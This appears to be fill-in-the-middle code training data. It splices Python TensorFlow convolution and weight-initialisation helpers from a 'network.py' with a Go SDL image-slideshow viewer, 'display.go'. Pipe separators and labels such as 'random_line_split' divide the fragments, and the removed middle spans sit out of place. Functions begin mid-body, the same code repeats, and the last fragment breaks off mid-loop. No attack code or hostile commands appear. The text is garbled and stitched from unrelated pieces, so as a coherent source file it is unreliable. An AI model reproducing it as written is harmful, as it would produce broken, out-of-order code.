def conv2d_config(input_shape, output_shape, filter_shape):
"""
Based on the desired input, output and filter shape, figure out the correct 2D convolution configuration to use
including the type (normal or full convolution), stride size, padding type/size
:param input_shape:
:param output_shape:
:param filter_shape:
:return:
"""
input_shape = tf.TensorShape(input_shape).as_list()
if len(input_shape) == 4:
batch_size = input_shape[0]
else:
batch_size = None
input_shape = np.array(input_shape[-3:])
output_shape = np.array(tf.TensorShape(output_shape).as_list()[-3:])
# Determine what kind of convolution to use
if np.all(input_shape[-3:-1] >= output_shape[-3:-1]):
conv_type = "NORMAL"
elif np.all(input_shape[-3:-1] <= output_shape[-3:-1]):
conv_type = 'FULL'
# swap input and output shape
input_shape, output_shape = output_shape, input_shape
else:
raise ValueError('Input shape dimensions must be both bigger than or both smaller than output shape dimensions')
filter_shape = np.array(tf.TensorShape(filter_shape).as_list()[:2] + [input_shape[-1], output_shape[-1]])
stride = np.ceil((input_shape[:2] - filter_shape[:2] + 1) / output_shape[:2]).astype(np.int)
padding = output_shape[:2] * stride - input_shape[:2] + filter_shape[:2] - 1
# Determine what type of padding can be used
if np.all(np.ceil(input_shape[:2] / stride) == output_shape[:2]):
padding_type = 'SAME'
else:
padding_type = 'VALID'
# get padded input shape
input_shape[:2] = input_shape[:2] + padding.astype(np.int)
padded_shape = [batch_size] + input_shape.tolist()
left_padding = np.ceil(padding / 2).astype(np.int)
right_padding = np.floor(padding / 2).astype(np.int)
padding = [[0, 0], [left_padding[0], right_padding[0]], [left_padding[1], right_padding[1]], [0, 0]]
stride = [1, stride[0], stride[1], 1]
return filter_shape.tolist(), stride, padding, padded_shape, conv_type, padding_type
def get_convolution_op(input_shape, output_shape, kernel_shape):
"""
Given the desired shapes of the input, output and filter tensors, returns the shape of the appropriate
convolution filter and a correctly configured op function. The returned op function should be called with the
input tensor and weight tensor, and returns a result of 2D convolution that matches the desired output_shape
:param input_shape: desired input shape into the convolution operation
:param output_shape: desired output shape from the convolution operation
:param kernel_shape: desired convolution kernel shape. Only the first two diemensions (height and width) will be used.
:return: (filter_shape, conv_op) The shape of the appropriate convolution filter/weight to be used (filter_shape) and
a function that can be invoked with inputs tensor and correctly sized filter tensor to define the convolution operation.
"""
filter_shape, strides, padding, padded_shape, conv_type, padding_type = conv2d_config(input_shape, output_shape, kernel_shape)
if conv_type == 'NORMAL':
def conv_op(inputs, weight, name='generic_convolution'):
with tf.name_scope(name):
if padding_type=='VALID' and np.sum(padding) > 0:
inputs = tf.pad(inputs, padding, name='padding')
return tf.nn.conv2d(inputs, weight, strides, padding_type, name='convolution')
else:
def conv_op(inputs, weight, name='generic_convolution'):
if padding_type=='SAME':
padded_output = [padded_shape[0]] + output_shape[-3:]
else:
padded_output = padded_shape
with tf.name_scope(name):
if padded_output[0] is None:
batch_size = tf.shape(inputs)[0]
padded_output = [batch_size] + padded_output[1:]
output = tf.nn.conv2d_transpose(inputs, weight, padded_output, strides, padding_type, name='transpose_convolution')
if padding_type=='VALID' and np.sum(padding) > 0:
output = tf.slice(output, [0, padding[1][0], padding[2][0], 0],
[-1] + output_shape[-3:], name='cropping')
return output
return filter_shape, conv_op
def normalize_weights(w, dims=(0,), bias=1e-5):
"""
L2 normalize weights of the given tensor along specified dimension(s).
Args:
w: Tensor to be normalized
dims: dimension(s) along which to normalize the Tensor. Defaults to (0,)
bias: Bias value added to the computed norm to prevent dividing by 0. Defaults to 1e-5
Returns: Tensor of same type and shape as `w` whose norm is set to approximately 1 along the specificed dimensions
"""
with tf.name_scope('normalization'):
return w / (tf.sqrt(tf.reduce_sum(tf.square(w), dims, keep_dims=True) + bias))
def weight_variable(shape, name='weight', mean=0.0, stddev=None, initializer=None, constrain=None, dtype=tf.float32):
"""
Creates and returns a variable initialized with random_normal_initializer, suitable for use as a weight.
In the current variable scope, creates (if necessary) and returns a named variable with `tf.random_normal_initializer`.
Args:
shape: Required. Shape of the variable
name: Optional. Name of the variable. Defaults to 'weight'
mean: Optional. Mean of the `random_normal_initializer`. Defaults to 0.0
stddev: Optional. Standard deviation of the `random_normal_initializer`. Defaults to 1e-3
dtype: Optional. Data type of the variable. Default to `tf.float32`.
Returns: Weight variable with specified name and shape with random normal initialization.
"""
if stddev is None:
raise ValueError('stddev not specified!')
if initializer is None:
initializer = tf.random_normal_initializer(mean=mean, stddev=stddev)
weights = tf.get_variable(name, shape=shape, initializer=initializer, dtype=dtype)
if constrain is not None:
constrain(weights)
return weights
def bias_variable(shape, name='bias', value=0.0, initializer=None, constrain=None, dtype=tf.float32):
"""
Creates and returns a variable initialized with random_normal_initializer, suitable for use as a bias.
In the current variable scope, creates (if necessary) and returns a named variable with `tf.random_normal_initializer`.
Args:
shape: Required. Shape of the variable
name: Optional. Name of the variable. Defaults to 'bias'
value: Optional. Constant value to which the variable is initialized. Defaults to 0.0
dtype: Optional. Data type of the variable. Default to `tf.float32`.
Returns: Bias variable with specified name and shape initialized to a constant.
"""
if initializer is None:
initializer = tf.constant_initializer(value=value)
biases = tf.get_variable(name, shape=shape, initializer=initializer, dtype=dtype)
if constrain is not None:
constrain(biases)
return biases
def factorized_readout(inputs, n_outputs=100, constrain=True):
width, height, n_features = inputs.get_shape()[1:].as_list()
n_pixels = width * height
with tf.variable_scope('readout'):
# spatial readout
w_spatial = weight_variable([n_pixels, 1, n_outputs], name='weight_spatial')
if constrain:
constraints.positive_constrain(w_spatial)
w_spatial_norm = normalize_weights(w_spatial, dims=(0,))
# feature readout
w_feature = weight_variable([1, n_features, n_outputs], name='weight_feature')
if constrain:
constraints.positive_constrain(w_feature)
w_feature_norm = normalize_weights(w_feature, dims=(1,))
# scaling
w_scale = bias_variable([n_outputs], name='weight_scale', value=1.0)
if constrain:
constraints.positive_constrain(w_scale)
# total readout weight
w_out = tf.reshape(w_spatial_norm * w_feature_norm * w_scale, [n_pixels * n_features, n_outputs],
'weight_readout')
output = tf.matmul(tf.reshape(inputs, [-1, n_pixels * n_features]), w_out)
return output, w_spatial_norm, w_feature_norm, w_scale, w_out
def batch_norm(inputs, *args, tag=None, add_summary=True, step=0, **kwargs):
| if step > 0 and 'updates_collections' not in kwargs:
kwargs['updates_collections'] = 'dump'
output = layers.batch_norm(inputs, *args, **kwargs)
if add_summary:
if tag is None:
tag = inputs.op.name.split('/')[-1]
tag = 'batch_norm/' + tag
tf.histogram_summary(tag, inputs)
tf.histogram_summary(tag + '_bn', output)
return output | identifier_body | |
network.py | ## Collection of utils for building networks
import numpy as np
import tensorflow as tf
from tensorflow.contrib import layers
from atflow import constraints
def conv2d_output_shape(input_shape, filter_shape, stride, padding):
"""
Computes the shape of the output tensor from conv2d operation with the given configuration
:param input_shape: shape of the input tensor, must be a list, numpy array or TensorShape
:param filter_shape: shape of the convolution filter.
:param stride: stride for the convolution
:param padding: padding mode, either 'VALID' or 'SAME'
:return: shape of the output tensor as a plain list of integers
"""
filter_shape = tf.TensorShape(filter_shape).as_list()
filter_out = filter_shape[-1]
filter_patch_shape = np.array(filter_shape[0:2])
input_shape_list = tf.TensorShape(input_shape).as_list()
batch = input_shape_list[:-3]
input_shape = np.array(input_shape_list[-3:])
stride = np.array(stride)
if padding == 'VALID':
shift = -filter_patch_shape + 1
elif padding == 'SAME':
shift = 0
else:
raise ValueError('padding must be either "VALID" or "SAME", but "%s" was given' % padding)
output_shape = np.ceil((input_shape[:2] + shift) / stride[1:3])
return batch + output_shape.astype(np.int).tolist() + [filter_out]
def conv2d_config(input_shape, output_shape, filter_shape):
"""
Based on the desired input, output and filter shape, figure out the correct 2D convolution configuration to use
including the type (normal or full convolution), stride size, padding type/size
:param input_shape:
:param output_shape:
:param filter_shape:
:return:
"""
input_shape = tf.TensorShape(input_shape).as_list()
if len(input_shape) == 4:
batch_size = input_shape[0]
else:
batch_size = None
input_shape = np.array(input_shape[-3:])
output_shape = np.array(tf.TensorShape(output_shape).as_list()[-3:])
# Determine what kind of convolution to use
if np.all(input_shape[-3:-1] >= output_shape[-3:-1]):
conv_type = "NORMAL"
elif np.all(input_shape[-3:-1] <= output_shape[-3:-1]):
conv_type = 'FULL'
# swap input and output shape
input_shape, output_shape = output_shape, input_shape
else:
raise ValueError('Input shape dimensions must be both bigger than or both smaller than output shape dimensions')
filter_shape = np.array(tf.TensorShape(filter_shape).as_list()[:2] + [input_shape[-1], output_shape[-1]])
stride = np.ceil((input_shape[:2] - filter_shape[:2] + 1) / output_shape[:2]).astype(np.int)
padding = output_shape[:2] * stride - input_shape[:2] + filter_shape[:2] - 1
# Determine what type of padding can be used
if np.all(np.ceil(input_shape[:2] / stride) == output_shape[:2]):
padding_type = 'SAME'
else:
padding_type = 'VALID'
# get padded input shape
input_shape[:2] = input_shape[:2] + padding.astype(np.int)
padded_shape = [batch_size] + input_shape.tolist()
left_padding = np.ceil(padding / 2).astype(np.int)
right_padding = np.floor(padding / 2).astype(np.int)
padding = [[0, 0], [left_padding[0], right_padding[0]], [left_padding[1], right_padding[1]], [0, 0]]
stride = [1, stride[0], stride[1], 1]
return filter_shape.tolist(), stride, padding, padded_shape, conv_type, padding_type
def get_convolution_op(input_shape, output_shape, kernel_shape):
"""
Given the desired shapes of the input, output and filter tensors, returns the shape of the appropriate
convolution filter and a correctly configured op function. The returned op function should be called with the
input tensor and weight tensor, and returns a result of 2D convolution that matches the desired output_shape
:param input_shape: desired input shape into the convolution operation
:param output_shape: desired output shape from the convolution operation
:param kernel_shape: desired convolution kernel shape. Only the first two diemensions (height and width) will be used.
:return: (filter_shape, conv_op) The shape of the appropriate convolution filter/weight to be used (filter_shape) and
a function that can be invoked with inputs tensor and correctly sized filter tensor to define the convolution operation.
"""
filter_shape, strides, padding, padded_shape, conv_type, padding_type = conv2d_config(input_shape, output_shape, kernel_shape)
if conv_type == 'NORMAL':
def conv_op(inputs, weight, name='generic_convolution'):
with tf.name_scope(name):
if padding_type=='VALID' and np.sum(padding) > 0:
inputs = tf.pad(inputs, padding, name='padding')
return tf.nn.conv2d(inputs, weight, strides, padding_type, name='convolution')
else:
def conv_op(inputs, weight, name='generic_convolution'):
if padding_type=='SAME':
padded_output = [padded_shape[0]] + output_shape[-3:]
else:
padded_output = padded_shape
with tf.name_scope(name):
if padded_output[0] is None: | output = tf.slice(output, [0, padding[1][0], padding[2][0], 0],
[-1] + output_shape[-3:], name='cropping')
return output
return filter_shape, conv_op
def normalize_weights(w, dims=(0,), bias=1e-5):
"""
L2 normalize weights of the given tensor along specified dimension(s).
Args:
w: Tensor to be normalized
dims: dimension(s) along which to normalize the Tensor. Defaults to (0,)
bias: Bias value added to the computed norm to prevent dividing by 0. Defaults to 1e-5
Returns: Tensor of same type and shape as `w` whose norm is set to approximately 1 along the specificed dimensions
"""
with tf.name_scope('normalization'):
return w / (tf.sqrt(tf.reduce_sum(tf.square(w), dims, keep_dims=True) + bias))
def weight_variable(shape, name='weight', mean=0.0, stddev=None, initializer=None, constrain=None, dtype=tf.float32):
"""
Creates and returns a variable initialized with random_normal_initializer, suitable for use as a weight.
In the current variable scope, creates (if necessary) and returns a named variable with `tf.random_normal_initializer`.
Args:
shape: Required. Shape of the variable
name: Optional. Name of the variable. Defaults to 'weight'
mean: Optional. Mean of the `random_normal_initializer`. Defaults to 0.0
stddev: Optional. Standard deviation of the `random_normal_initializer`. Defaults to 1e-3
dtype: Optional. Data type of the variable. Default to `tf.float32`.
Returns: Weight variable with specified name and shape with random normal initialization.
"""
if stddev is None:
raise ValueError('stddev not specified!')
if initializer is None:
initializer = tf.random_normal_initializer(mean=mean, stddev=stddev)
weights = tf.get_variable(name, shape=shape, initializer=initializer, dtype=dtype)
if constrain is not None:
constrain(weights)
return weights
def bias_variable(shape, name='bias', value=0.0, initializer=None, constrain=None, dtype=tf.float32):
"""
Creates and returns a variable initialized with random_normal_initializer, suitable for use as a bias.
In the current variable scope, creates (if necessary) and returns a named variable with `tf.random_normal_initializer`.
Args:
shape: Required. Shape of the variable
name: Optional. Name of the variable. Defaults to 'bias'
value: Optional. Constant value to which the variable is initialized. Defaults to 0.0
dtype: Optional. Data type of the variable. Default to `tf.float32`.
Returns: Bias variable with specified name and shape initialized to a constant.
"""
if initializer is None:
initializer = tf.constant_initializer(value=value)
biases = tf.get_variable(name, shape=shape, initializer=initializer, dtype=dtype)
if constrain is not None:
constrain(biases)
return biases
def factorized_readout(inputs, n_outputs=100, constrain=True):
width, height, n_features = inputs.get_shape()[1:].as_list()
n_pixels = width * height
with tf.variable_scope('readout'):
# spatial readout
w_spatial = weight_variable([n_pixels, 1, n_outputs], name='weight_spatial')
if constrain:
constraints.positive_constrain(w_spatial)
w_spatial_norm = normalize_weights(w_spatial, dims=(0,))
# feature readout
w_feature = weight_variable([1, n_features, n_outputs], name='weight_feature')
if constrain:
constraints.positive_constrain(w_feature)
w_feature_norm = normalize_weights(w_feature, dims=(1,))
# scaling
w_scale = bias_variable([n_outputs], name='weight_scale', value=1.0)
if constrain:
constraints.positive_constrain(w_scale)
# total readout weight
w_out = tf.reshape(w_spatial_norm * w_feature_norm * w_scale, [n_pixels * n_features, n_outputs],
'weight_readout')
output = tf.matmul(tf.reshape(inputs, [-1, n_pixels * n_features]), w_out)
return output, w_spatial_norm, w_feature_norm, w_scale, w_out
def batch_norm(inputs, *args, tag=None, add_summary=True, step=0, **kwargs):
if step > 0 and 'updates_collections' not in kwargs:
kwargs['updates_collections'] = 'dump'
output = layers.batch_norm(inputs, *args, **kwargs)
if add_summary:
if tag is None:
tag = inputs.op.name.split('/')[-1]
tag = 'batch_norm/' + tag
tf.histogram_summary(tag, inputs)
tf.histogram_summary(tag + '_bn', output)
return output | batch_size = tf.shape(inputs)[0]
padded_output = [batch_size] + padded_output[1:]
output = tf.nn.conv2d_transpose(inputs, weight, padded_output, strides, padding_type, name='transpose_convolution')
if padding_type=='VALID' and np.sum(padding) > 0: | random_line_split |
display.go | package core
//#include <stdlib.h>
import "C"
import (
"fmt"
"os"
"path/filepath"
"runtime"
"strconv"
"github.com/n0dev/go-slideshow/core/picture"
"github.com/n0dev/go-slideshow/core/picture/exif"
"github.com/n0dev/go-slideshow/logger"
"github.com/n0dev/go-slideshow/utils"
"github.com/veandco/go-sdl2/img"
"github.com/veandco/go-sdl2/sdl"
"github.com/veandco/go-sdl2/ttf"
)
const (
winTitle = "GoSlideshow"
winDefaultWidth = 600
winDefaultHeight = 800
)
var (
sdlColorWhite = sdl.Color{A: 0, B: 0, G: 0, R: 0}
sdlColorBlack = sdl.Color{A: 0, B: 255, G: 255, R: 255}
)
// Information about the display window
type winInfo struct {
window *sdl.Window
renderer *sdl.Renderer
font *ttf.Font
symbols *ttf.Font
fullscreen bool
displayInfo bool
}
type imgInfo struct {
path string
H int32
W int32
texture *sdl.Texture
}
// Change the title according to the inputs
func (win *winInfo) setTitle(position int, total int, path string) {
win.window.SetTitle(winTitle + " - " + strconv.Itoa(position) + "/" + strconv.Itoa(total) + " - " + filepath.Base(path))
}
// Create the texture from text using TTF
func (win *winInfo) renderText(text string) (*sdl.Texture, error) {
surface, err := win.font.RenderUTF8Shaded(text, sdlColorBlack, sdlColorWhite)
defer surface.Free()
if err != nil {
return nil, err
}
texture, err := win.renderer.CreateTextureFromSurface(surface)
if err != nil {
return nil, err
}
return texture, nil
}
// displayLoading display loading on background
func (win *winInfo) displayLoading() {
texture, _ := win.renderText("Loading...")
ww, wh := win.window.GetSize()
win.renderer.Copy(texture, nil, &sdl.Rect{X: int32(ww/2 - 50), Y: int32(wh/2 - 1), W: 65, H: 20})
texture.Destroy()
win.renderer.Present()
}
// displayPictureInfo display all information about the picture
func (win *winInfo) displayPictureInfo() {
/* Display exif information */
go func(path string) {
exif.Open(path)
}(curImg().path)
msg := filepath.Base(curImg().path)
texture, _ := win.renderText(msg)
width := int32(len(msg) * 8)
win.renderer.Copy(texture, nil, &sdl.Rect{X: 2, Y: 2, W: width, H: 20})
texture.Destroy()
}
func loadImg(win *winInfo, index int) {
if slide.list[index].texture == nil {
var err error
var surface *sdl.Surface
logger.Trace("load " + slide.list[index].path)
surface, err = img.Load(slide.list[index].path)
if err != nil {
fmt.Printf("Failed to load: %s\n", err)
}
defer surface.Free()
slide.list[index].H = surface.H
slide.list[index].W = surface.W
slide.list[index].texture, err = win.renderer.CreateTextureFromSurface(surface)
if err != nil {
fmt.Printf("Failed to create texture: %s\n", err)
}
}
}
func (win *winInfo) displayBar() {
message := "\uF04A \uF04B \uF04E \uF0E2 \uF01E"
surface, err := win.symbols.RenderUTF8Shaded(message, sdlColorWhite, sdlColorBlack)
if err == nil {
texture, err := win.renderer.CreateTextureFromSurface(surface)
if err != nil {
fmt.Println(err)
}
surface.Free()
width := int32(len(message) * 18)
win.renderer.Copy(texture, nil, &sdl.Rect{X: 120, Y: 500, W: width, H: 40})
texture.Destroy()
} else {
logger.Warning("OMG")
}
}
func resetImg(index int) {
if slide.list[index].texture != nil {
slide.list[index].texture.Destroy()
slide.list[index].texture = nil
}
}
func (win *winInfo) loadAndFreeAround() {
p1 := utils.Mod(slide.current-1, len(slide.list))
p2 := utils.Mod(slide.current-1, len(slide.list))
n1 := utils.Mod(slide.current+1, len(slide.list))
n2 := utils.Mod(slide.current+2, len(slide.list))
n3 := utils.Mod(slide.current+3, len(slide.list))
refresh := utils.IntList{p1, p2, n1, n2, n3}
// preload the previous and next two images
for _, idx := range refresh {
loadImg(win, idx)
}
d1 := utils.Mod(slide.current-3, len(slide.list))
d2 := utils.Mod(slide.current+3, len(slide.list))
if !refresh.Find(d1) {
resetImg(d1)
}
if !refresh.Find(d2) {
resetImg(d2)
}
}
func (win *winInfo) loadCurrentImage(render bool) {
var src, dst sdl.Rect
// load and display the current image
loadImg(win, slide.current)
// Display information of the image
ww, wh := win.window.GetSize()
src = sdl.Rect{X: 0, Y: 0, W: curImg().W, H: curImg().H}
iw, ih := utils.ComputeFitImage(uint32(ww), uint32(wh), uint32(curImg().W), uint32(curImg().H)) | if render {
win.renderer.Clear()
win.renderer.Copy(curImg().texture, &src, &dst)
if window.displayInfo {
window.displayPictureInfo()
}
//window.displayBar()
win.renderer.Present()
}
// Update the window title
win.setTitle(slide.current+1, len(slide.list), curImg().path)
// Preload and free images from the list
win.loadAndFreeAround()
}
// Arrange that main.main runs on main thread.
func init() {
runtime.LockOSThread()
// Video only
if err := sdl.Init(sdl.INIT_VIDEO); err != nil {
logger.Warning(err.Error())
}
}
var window winInfo
// MainLoop initializes the SDL package and run the main loop
func MainLoop(fullScreen bool, slideshow bool) int {
var event sdl.Event
var src, dst sdl.Rect
var err error
var flags uint32 = sdl.WINDOW_SHOWN | sdl.WINDOW_RESIZABLE | sdl.WINDOW_ALLOW_HIGHDPI
// Load the font library
if err := ttf.Init(); err != nil {
logger.Warning("Unable to open font lib")
}
window.window, err = sdl.CreateWindow(winTitle, sdl.WINDOWPOS_UNDEFINED, sdl.WINDOWPOS_UNDEFINED, winDefaultHeight, winDefaultWidth, flags)
if err != nil {
fmt.Fprintf(os.Stderr, "Failed to create window: %s\n", err)
return 1
}
defer window.window.Destroy()
// Load resources
if f, err := filepath.Abs(filepath.Dir(os.Args[0])); err == nil {
icon := filepath.Join(f, "app", "icon.bmp")
if i, err := sdl.LoadBMP(icon); err == nil {
window.window.SetIcon(i)
}
font := filepath.Join(f, "app", "fonts", "opensans.ttf")
window.font, err = ttf.OpenFont(font, 14)
if err != nil {
logger.Warning("Unable to load " + font)
}
window.font.SetKerning(false)
font = filepath.Join(f, "app", "fonts", "fontawesome.ttf")
window.symbols, err = ttf.OpenFont(font, 64)
if err != nil {
logger.Warning("Unable to load " + font)
}
}
window.renderer, err = sdl.CreateRenderer(window.window, -1, sdl.RENDERER_ACCELERATED)
if err != nil {
fmt.Fprintf(os.Stderr, "Failed to create renderer: %s\n", err)
return 2
}
defer window.renderer.Destroy()
window.displayInfo = false
window.displayLoading()
window.setTitle(slide.current+1, len(slide.list), curImg().path)
window.loadCurrentImage(false)
// Declare if the image needs to be updated
var update = false
var running = true
for running {
event = sdl.WaitEvent()
switch t := event.(type) {
case *sdl.QuitEvent:
running = false
case *sdl.DropEvent:
fileName := t.File
// Check if picture already in list
found := false
for i := range slide.list {
if slide.list[i].path == fileName {
found = true
slide.current = i
update = true
break
}
}
if !found {
if err := addPic(fileName); err != nil {
sdl.ShowSimpleMessageBox(sdl.MESSAGEBOX_INFORMATION, "File dropped on window", "Cannot add "+fileName, window.window)
} else {
slide.current = len(slide.list) - 1
update = true
}
}
/*case *sdl.MouseMotionEvent:
fmt.Printf("[%d ms] MouseMotion\ttype:%d\tid:%d\tx:%d\ty:%d\txrel:%d\tyrel:%d\n",
t.Timestamp, t.Type, t.Which, t.X, t.Y, t.XRel, t.YRel)
case *sdl.MouseButtonEvent:
fmt.Printf("[%d ms] MouseButton\ttype:%d\tid:%d\tx:%d\ty:%d\tbutton:%d\tstate:%d\n",
t.Timestamp, t.Type, t.Which, t.X, t.Y, t.Button, t.State)*/
case *sdl.WindowEvent:
if t.Event == sdl.WINDOWEVENT_RESIZED || t.Event == sdl.WINDOWEVENT_EXPOSED {
window.window.SetSize(t.Data1, t.Data2)
// Display information of the image
wWidth, wHeight := window.window.GetSize()
src = sdl.Rect{X: 0, Y: 0, W: curImg().W, H: curImg().H}
fitWidth, fitHeight := utils.ComputeFitImage(uint32(wWidth), uint32(wHeight), uint32(curImg().W), uint32(curImg().H))
dst = sdl.Rect{X: int32(wWidth/2 - int32(fitWidth)/2), Y: int32(wHeight/2 - int32(fitHeight)/2), W: int32(fitWidth), H: int32(fitHeight)}
window.renderer.Clear()
window.renderer.Copy(curImg().texture, &src, &dst)
window.renderer.Present()
if window.displayInfo {
window.displayPictureInfo()
window.renderer.Present()
}
}
case *sdl.KeyboardEvent:
if t.GetType() != sdl.KEYDOWN {
break
}
// Get next or previous image
if t.Repeat == 0 {
if t.Keysym.Sym == sdl.K_LEFT {
slide.current = utils.Mod((slide.current - 1), len(slide.list))
update = true
} else if t.Keysym.Sym == sdl.K_RIGHT {
slide.current = utils.Mod((slide.current + 1), len(slide.list))
update = true
} else if t.Keysym.Sym == sdl.K_PAGEUP {
if err := picture.RotateImage(curImg().path, picture.CounterClockwise); err != nil {
logger.Warning(err.Error())
} else {
resetImg(slide.current)
}
update = true
} else if t.Keysym.Sym == sdl.K_PAGEDOWN {
if err := picture.RotateImage(curImg().path, picture.Clockwise); err != nil {
logger.Warning(err.Error())
} else {
resetImg(slide.current)
}
update = true
} else if t.Keysym.Sym == 102 { // F
if window.fullscreen {
window.window.SetFullscreen(0)
} else {
// Go fullscreen
window.window.SetFullscreen(sdl.WINDOW_FULLSCREEN_DESKTOP)
}
window.fullscreen = !window.fullscreen
} else if t.Keysym.Sym == 105 { // I
window.displayInfo = !window.displayInfo
if window.displayInfo {
fmt.Println("Toggle info: on")
window.displayPictureInfo()
window.renderer.Present()
} else {
fmt.Println("Toggle info: off")
update = true
}
} else if t.Keysym.Sym == sdl.K_ESCAPE {
if window.fullscreen {
window.window.SetFullscreen(0)
window.fullscreen = false
}
} else {
fmt.Printf("%d\n", t.Keysym.Sym)
}
}
}
if update {
window.loadCurrentImage(true)
update = false
}
}
return 0
} | dst = sdl.Rect{X: int32(ww/2 - int32(iw)/2), Y: int32(wh/2 - int32(ih)/2), W: int32(iw), H: int32(ih)}
| random_line_split |
display.go | package core
//#include <stdlib.h>
import "C"
import (
"fmt"
"os"
"path/filepath"
"runtime"
"strconv"
"github.com/n0dev/go-slideshow/core/picture"
"github.com/n0dev/go-slideshow/core/picture/exif"
"github.com/n0dev/go-slideshow/logger"
"github.com/n0dev/go-slideshow/utils"
"github.com/veandco/go-sdl2/img"
"github.com/veandco/go-sdl2/sdl"
"github.com/veandco/go-sdl2/ttf"
)
const (
winTitle = "GoSlideshow"
winDefaultWidth = 600
winDefaultHeight = 800
)
var (
sdlColorWhite = sdl.Color{A: 0, B: 0, G: 0, R: 0}
sdlColorBlack = sdl.Color{A: 0, B: 255, G: 255, R: 255}
)
// Information about the display window
type winInfo struct {
window *sdl.Window
renderer *sdl.Renderer
font *ttf.Font
symbols *ttf.Font
fullscreen bool
displayInfo bool
}
type imgInfo struct {
path string
H int32
W int32
texture *sdl.Texture
}
// Change the title according to the inputs
func (win *winInfo) setTitle(position int, total int, path string) {
win.window.SetTitle(winTitle + " - " + strconv.Itoa(position) + "/" + strconv.Itoa(total) + " - " + filepath.Base(path))
}
// Create the texture from text using TTF
func (win *winInfo) renderText(text string) (*sdl.Texture, error) {
surface, err := win.font.RenderUTF8Shaded(text, sdlColorBlack, sdlColorWhite)
defer surface.Free()
if err != nil {
return nil, err
}
texture, err := win.renderer.CreateTextureFromSurface(surface)
if err != nil {
return nil, err
}
return texture, nil
}
// displayLoading display loading on background
func (win *winInfo) displayLoading() {
texture, _ := win.renderText("Loading...")
ww, wh := win.window.GetSize()
win.renderer.Copy(texture, nil, &sdl.Rect{X: int32(ww/2 - 50), Y: int32(wh/2 - 1), W: 65, H: 20})
texture.Destroy()
win.renderer.Present()
}
// displayPictureInfo display all information about the picture
func (win *winInfo) displayPictureInfo() {
/* Display exif information */
go func(path string) {
exif.Open(path)
}(curImg().path)
msg := filepath.Base(curImg().path)
texture, _ := win.renderText(msg)
width := int32(len(msg) * 8)
win.renderer.Copy(texture, nil, &sdl.Rect{X: 2, Y: 2, W: width, H: 20})
texture.Destroy()
}
func loadImg(win *winInfo, index int) {
if slide.list[index].texture == nil {
var err error
var surface *sdl.Surface
logger.Trace("load " + slide.list[index].path)
surface, err = img.Load(slide.list[index].path)
if err != nil {
fmt.Printf("Failed to load: %s\n", err)
}
defer surface.Free()
slide.list[index].H = surface.H
slide.list[index].W = surface.W
slide.list[index].texture, err = win.renderer.CreateTextureFromSurface(surface)
if err != nil {
fmt.Printf("Failed to create texture: %s\n", err)
}
}
}
func (win *winInfo) displayBar() {
message := "\uF04A \uF04B \uF04E \uF0E2 \uF01E"
surface, err := win.symbols.RenderUTF8Shaded(message, sdlColorWhite, sdlColorBlack)
if err == nil {
texture, err := win.renderer.CreateTextureFromSurface(surface)
if err != nil {
fmt.Println(err)
}
surface.Free()
width := int32(len(message) * 18)
win.renderer.Copy(texture, nil, &sdl.Rect{X: 120, Y: 500, W: width, H: 40})
texture.Destroy()
} else {
logger.Warning("OMG")
}
}
func resetImg(index int) {
if slide.list[index].texture != nil {
slide.list[index].texture.Destroy()
slide.list[index].texture = nil
}
}
func (win *winInfo) loadAndFreeAround() {
p1 := utils.Mod(slide.current-1, len(slide.list))
p2 := utils.Mod(slide.current-1, len(slide.list))
n1 := utils.Mod(slide.current+1, len(slide.list))
n2 := utils.Mod(slide.current+2, len(slide.list))
n3 := utils.Mod(slide.current+3, len(slide.list))
refresh := utils.IntList{p1, p2, n1, n2, n3}
// preload the previous and next two images
for _, idx := range refresh {
loadImg(win, idx)
}
d1 := utils.Mod(slide.current-3, len(slide.list))
d2 := utils.Mod(slide.current+3, len(slide.list))
if !refresh.Find(d1) {
resetImg(d1)
}
if !refresh.Find(d2) {
resetImg(d2)
}
}
func (win *winInfo) loadCurrentImage(render bool) {
var src, dst sdl.Rect
// load and display the current image
loadImg(win, slide.current)
// Display information of the image
ww, wh := win.window.GetSize()
src = sdl.Rect{X: 0, Y: 0, W: curImg().W, H: curImg().H}
iw, ih := utils.ComputeFitImage(uint32(ww), uint32(wh), uint32(curImg().W), uint32(curImg().H))
dst = sdl.Rect{X: int32(ww/2 - int32(iw)/2), Y: int32(wh/2 - int32(ih)/2), W: int32(iw), H: int32(ih)}
if render {
win.renderer.Clear()
win.renderer.Copy(curImg().texture, &src, &dst)
if window.displayInfo {
window.displayPictureInfo()
}
//window.displayBar()
win.renderer.Present()
}
// Update the window title
win.setTitle(slide.current+1, len(slide.list), curImg().path)
// Preload and free images from the list
win.loadAndFreeAround()
}
// Arrange that main.main runs on main thread.
func init() {
runtime.LockOSThread()
// Video only
if err := sdl.Init(sdl.INIT_VIDEO); err != nil {
logger.Warning(err.Error())
}
}
var window winInfo
// MainLoop initializes the SDL package and run the main loop
func | (fullScreen bool, slideshow bool) int {
var event sdl.Event
var src, dst sdl.Rect
var err error
var flags uint32 = sdl.WINDOW_SHOWN | sdl.WINDOW_RESIZABLE | sdl.WINDOW_ALLOW_HIGHDPI
// Load the font library
if err := ttf.Init(); err != nil {
logger.Warning("Unable to open font lib")
}
window.window, err = sdl.CreateWindow(winTitle, sdl.WINDOWPOS_UNDEFINED, sdl.WINDOWPOS_UNDEFINED, winDefaultHeight, winDefaultWidth, flags)
if err != nil {
fmt.Fprintf(os.Stderr, "Failed to create window: %s\n", err)
return 1
}
defer window.window.Destroy()
// Load resources
if f, err := filepath.Abs(filepath.Dir(os.Args[0])); err == nil {
icon := filepath.Join(f, "app", "icon.bmp")
if i, err := sdl.LoadBMP(icon); err == nil {
window.window.SetIcon(i)
}
font := filepath.Join(f, "app", "fonts", "opensans.ttf")
window.font, err = ttf.OpenFont(font, 14)
if err != nil {
logger.Warning("Unable to load " + font)
}
window.font.SetKerning(false)
font = filepath.Join(f, "app", "fonts", "fontawesome.ttf")
window.symbols, err = ttf.OpenFont(font, 64)
if err != nil {
logger.Warning("Unable to load " + font)
}
}
window.renderer, err = sdl.CreateRenderer(window.window, -1, sdl.RENDERER_ACCELERATED)
if err != nil {
fmt.Fprintf(os.Stderr, "Failed to create renderer: %s\n", err)
return 2
}
defer window.renderer.Destroy()
window.displayInfo = false
window.displayLoading()
window.setTitle(slide.current+1, len(slide.list), curImg().path)
window.loadCurrentImage(false)
// Declare if the image needs to be updated
var update = false
var running = true
for running {
event = sdl.WaitEvent()
switch t := event.(type) {
case *sdl.QuitEvent:
running = false
case *sdl.DropEvent:
fileName := t.File
// Check if picture already in list
found := false
for i := range slide.list {
if slide.list[i].path == fileName {
found = true
slide.current = i
